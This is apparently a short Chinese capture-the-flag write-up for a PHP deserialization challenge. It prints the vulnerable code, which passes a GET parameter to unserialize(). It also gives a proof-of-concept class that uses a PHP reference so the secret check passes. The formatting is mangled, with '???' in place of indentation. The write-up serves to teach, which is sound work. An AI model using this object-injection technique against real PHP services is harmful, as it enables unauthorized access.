题目如下:
<?phpclass just4fun { ???var $enter; ???var $secret;}if (isset($_GET[‘pass‘])) { ???$pass = $_GET[‘pass‘]; ???if(get_magic_quotes_gpc()){ ???????$pass=stripslashes($pass); ???} ???$o = unserialize($pass); ???if ($o) { ???????$o->secret = "*"; ???????if ($o->secret === $o->enter) ???????????echo "Congratulation! Here is my secret: ".$o->secret; ???????else ????????????echo "Oh no... You can‘t fool me"; ???} ???else echo "are you trolling?";}?>主要是涉及了一个PHP对象深浅拷贝,文章:
直接构造POC:
<?php class just4fun{ ???var $enter; ???var $secret; ???????function __construct() ???{ ???????$this->enter=&$this->secret; ???}}echo serialize(new just4fun()); ?>南邮PHP反序列化
原文地址:https://www.cnblogs.com/nul1/p/9417484.html